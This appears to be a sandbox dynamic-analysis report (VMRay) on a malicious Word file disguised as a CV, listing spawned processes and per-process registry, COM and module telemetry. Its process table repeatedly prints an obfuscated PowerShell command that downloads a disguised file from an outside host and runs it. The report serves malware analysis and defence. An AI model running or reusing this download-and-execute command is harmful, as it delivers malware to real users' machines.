a7d5e07a...fa3f | Grouped Behavior
Logo
Try VMRay Analyzer
VTI SCORE: 94/100
Dynamic Analysis Report
Classification: -

Edwin Dewitt - CV.doc

Word Document

Created at 2019-07-26T16:45:00

...

Remarks (1/1)

(0x200002e). Some of the analysis artifacts were not scanned by local AV due to an error. Check logs or contact support for further info.

Grouped Sequential

Monitored Processes

Process Graph

Process Graph Legend
Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x910 Analysis Target Medium winword.exe "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n -
#2 0xb58 Child Process Medium wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js" #1
#3 0xba4 Child Process Medium wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js" #1
#4 0x83c Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu #3
#5 0x848 Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu #2
#6 0x41c Child Process Medium wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js" #1
#7 0x8b8 Child Process Medium powershell.exe PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png'); #5
#8 0x31c Child Process Medium powershell.exe PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png'); #4
#10 0x838 Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu #6
#11 0x964 Child Process Medium powershell.exe PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png'); #10
#12 0x178 Child Process Medium wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js" #1
#13 0x538 Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu #12
#14 0x86c Child Process Medium powershell.exe PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png'); #13
#15 0x1ec Child Process Medium wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js" #1
#16 0xba0 Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu #15
#17 0xbb0 Child Process Medium wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js" #1
#18 0xbc4 Child Process Medium powershell.exe PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png'); #16
#19 0x8c0 Child Process Medium wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js" #1
#20 0x41c Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu #17
#21 0x568 Child Process Medium powershell.exe PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png'); #20
#22 0xbcc Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu #19
#23 0xafc Child Process Medium powershell.exe PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png'); #22
#24 0xb14 Child Process Medium wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js" #1
#25 0x154 Child Process Medium wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js" #1
#26 0x4fc Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu #24
#27 0xc4 Child Process Medium powershell.exe PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png'); #26
#28 0xa34 Child Process Medium wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js" #1
#29 0x828 Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu #25
#30 0x310 Child Process Medium powershell.exe PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png'); #29
#31 0x9fc Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu #28
#32 0x4d8 Child Process Medium powershell.exe PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png'); #31
#33 0xb6c Child Process Medium wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js" #1
#34 0x6a8 Child Process Medium wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js" #1
#35 0x978 Child Process Medium wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js" #1
#36 0x71c Child Process Medium wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js" #1
#37 0x8c0 Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu #35
#38 0xb44 Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu #34
#39 0xc04 Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu #33
#40 0xc54 Child Process Medium powershell.exe PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png'); #37
#41 0xc5c Child Process Medium powershell.exe PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png'); #39
#42 0xc64 Child Process Medium powershell.exe PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png'); #38
#43 0xc6c Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu #36
#44 0xce0 Child Process Medium powershell.exe PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png'); #43
#45 0xd50 Child Process Medium wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js" #1
#46 0xd88 Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu #45
#47 0xda4 Child Process Medium powershell.exe PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png'); #46

Behavior Information - Grouped by Category

Process #1: winword.exe
0 0
»
Information Value
ID #1
File Name c:\program files\microsoft office\root\office16\winword.exe
Command Line "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:20, Reason: Analysis Target
Unmonitor End Time: 00:04:10, Reason: Self Terminated
Monitor Duration 00:03:49
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x910
Parent PID 0x458 (c:\windows\explorer.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 9B8
0x 9B4
0x 9A0
0x 99C
0x 98C
0x 988
0x 984
0x 97C
0x 974
0x 970
0x 96C
0x 960
0x 954
0x 950
0x 94C
0x 928
0x 924
0x 920
0x 91C
0x 918
0x 914
0x A2C
0x A44
0x B54
0x B60
0x BA0
0x BAC
0x 52C
0x 8F0
0x 80C
0x 940
0x 4F4
0x 978
0x 260
0x 874
0x 90
0x A20
0x A3C
0x A34
0x AD4
0x 858
0x BC0
0x 8D4
0x 820
0x 8F8
0x 8C8
0x 5C8
0x BE4
0x A3C
0x B08
0x 71C
0x 6BC
0x B84
0x 5CC
0x 8D4
0x 178
0x 6FC
0x 70C
0x 4F4
0x A3C
0x 4B4
0x 9A8
0x 184
0x B84
0x 6FC
0x 95C
0x A3C
0x 8CC
0x 6EC
0x 288
0x D04
0x D0C
0x D1C
0x D20
0x D28
0x D58
0x F10
Process #2: wscript.exe
185 0
»
Information Value
ID #2
File Name c:\windows\system32\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:00:43, Reason: Child Process
Unmonitor End Time: 00:00:51, Reason: Self Terminated
Monitor Duration 00:00:07
OS Process Information
»
Information Value
PID 0xb58
Parent PID 0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B5C
0x B64
0x B68
0x B6C
0x B70
0x B94
0x B98
0x B9C
0x 40C
0x 500
Host Behavior
COM (6)
»
Operation Class Interface Additional Information Success Count Logfile
Create F414C260-6AC0-11CF-B6D1-00AA00BBBB58 00000000-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Create 00000323-0000-0000-C000-000000000046 00000146-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 6C736DB1-BD94-11D0-8A23-00AA00B58E10 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 06290BD1-48AA-11D2-8432-006008C3FBFC E4D1C9B0-46E8-11D4-A2A6-00104BD35090 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create WScript.Shell IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Create shell.applicatiOn IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
File (4)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js size = 19304, size_out = 19304 True 1
Fn
Data
Registry (30)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CLASSES_ROOT\.js - True 1
Fn
Open Key HKEY_CLASSES_ROOT\JSFile\ScriptEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 176, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 176, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 176, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 176, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 49, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\.js data = JSFile, type = REG_SZ True 1
Fn
Read Value HKEY_CLASSES_ROOT\JSFile\ScriptEngine data = JScript, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create cmd.exe show_window = 2470192 True 1
Fn
Module (27)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x77040000 True 1
Fn
Load ADVAPI32.dll base_address = 0x7fefd710000 True 1
Fn
Load ole32.dll base_address = 0x7fefea30000 True 1
Fn
Load C:\Windows\system32\advapi32.dll base_address = 0x7fefd710000 True 1
Fn
Get Handle c:\windows\system32\wscript.exe base_address = 0xff410000 True 3
Fn
Get Handle c:\windows\system32\ole32.dll base_address = 0x7fefea30000 True 2
Fn
Get Filename c:\windows\system32\wscript.exe process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = HeapSetInformation, address_out = 0x7705c4a0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegisterTraceGuidsA, address_out = 0x7717f570 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyExA, address_out = 0x7fefd72b5f0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegQueryValueExA, address_out = 0x7fefd72c480 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegCloseKey, address_out = 0x7fefd730710 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetObjectContext, address_out = 0x7fefea4c920 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoCreateInstance, address_out = 0x7fefea57490 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferIdentifyLevel, address_out = 0x7fefd72e470 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferCloseLevel, address_out = 0x7fefd72f660 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CLSIDFromProgIDEx, address_out = 0x7fefea4a4c4 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetClassObject, address_out = 0x7fefea62e18 True 1
Fn
Get Address c:\windows\system32\wscript.exe function = 1, address_out = 0xff41d7f8 True 1
Fn
Create Mapping C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304 True 1
Fn
Map C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = WSH-Timer, wndproc_parameter = 875104 True 1
Fn
System (78)
»
Operation Additional Information Success Count Logfile
Sleep duration = -1 (infinite) True 2
Fn
Get Time type = System Time, time = 2019-07-26 16:45:48 (UTC) True 1
Fn
Get Time type = Ticks, time = 116595 True 1
Fn
Get Time type = Performance Ctr, time = 16803872105 True 1
Fn
Get Time type = System Time, time = 2019-07-26 16:45:49 (UTC) True 1
Fn
Get Time type = Ticks, time = 117718 True 1
Fn
Get Time type = Performance Ctr, time = 16959931693 True 1
Fn
Get Time type = Ticks, time = 117749 True 2
Fn
Get Time type = System Time, time = 2019-07-26 16:45:50 (UTC) True 2
Fn
Get Time type = Ticks, time = 118030 True 1
Fn
Get Time type = Performance Ctr, time = 17068980236 True 1
Fn
Get Time type = Ticks, time = 118092 True 1
Fn
Get Time type = Performance Ctr, time = 17084286444 True 1
Fn
Get Time type = Ticks, time = 118404 True 1
Fn
Get Time type = Ticks, time = 118810 True 1
Fn
Get Time type = Ticks, time = 118935 True 1
Fn
Get Time type = Ticks, time = 119184 True 2
Fn
Get Time type = Ticks, time = 119293 True 2
Fn
Get Time type = Ticks, time = 119309 True 8
Fn
Get Time type = Ticks, time = 119449 True 3
Fn
Get Time type = Ticks, time = 119824 True 3
Fn
Get Time type = Ticks, time = 119871 True 3
Fn
Get Time type = Ticks, time = 119886 True 3
Fn
Get Time type = Ticks, time = 119902 True 4
Fn
Get Time type = Ticks, time = 119917 True 3
Fn
Get Time type = Ticks, time = 119949 True 4
Fn
Get Time type = Ticks, time = 120011 True 4
Fn
Get Time type = Ticks, time = 120027 True 2
Fn
Get Time type = Ticks, time = 120214 True 1
Fn
Get Time type = System Time, time = 2019-07-26 16:45:52 (UTC) True 1
Fn
Get Time type = Ticks, time = 120432 True 1
Fn
Get Time type = Performance Ctr, time = 17360966794 True 1
Fn
Get Time type = Ticks, time = 120448 True 4
Fn
Get Info type = Operating System True 6
Fn
Get Info type = Operating System True 1
Fn
Get Info type = System Directory, result_out = Ìô% True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String name = JS_PROFILER False 1
Fn
Process #3: wscript.exe
181 0
»
Information Value
ID #3
File Name c:\windows\system32\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:00:46, Reason: Child Process
Unmonitor End Time: 00:00:51, Reason: Self Terminated
Monitor Duration 00:00:04
OS Process Information
»
Information Value
PID 0xba4
Parent PID 0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x BA8
0x BB0
0x BB4
0x BB8
0x BBC
0x BC0
0x BC4
0x BC8
0x 484
0x 808
Host Behavior
COM (6)
»
Operation Class Interface Additional Information Success Count Logfile
Create F414C260-6AC0-11CF-B6D1-00AA00BBBB58 00000000-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Create 00000323-0000-0000-C000-000000000046 00000146-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 6C736DB1-BD94-11D0-8A23-00AA00B58E10 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 06290BD1-48AA-11D2-8432-006008C3FBFC E4D1C9B0-46E8-11D4-A2A6-00104BD35090 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create WScript.Shell IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Create shell.applicatiOn IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
File (4)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js size = 19304, size_out = 19304 True 1
Fn
Data
Registry (30)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
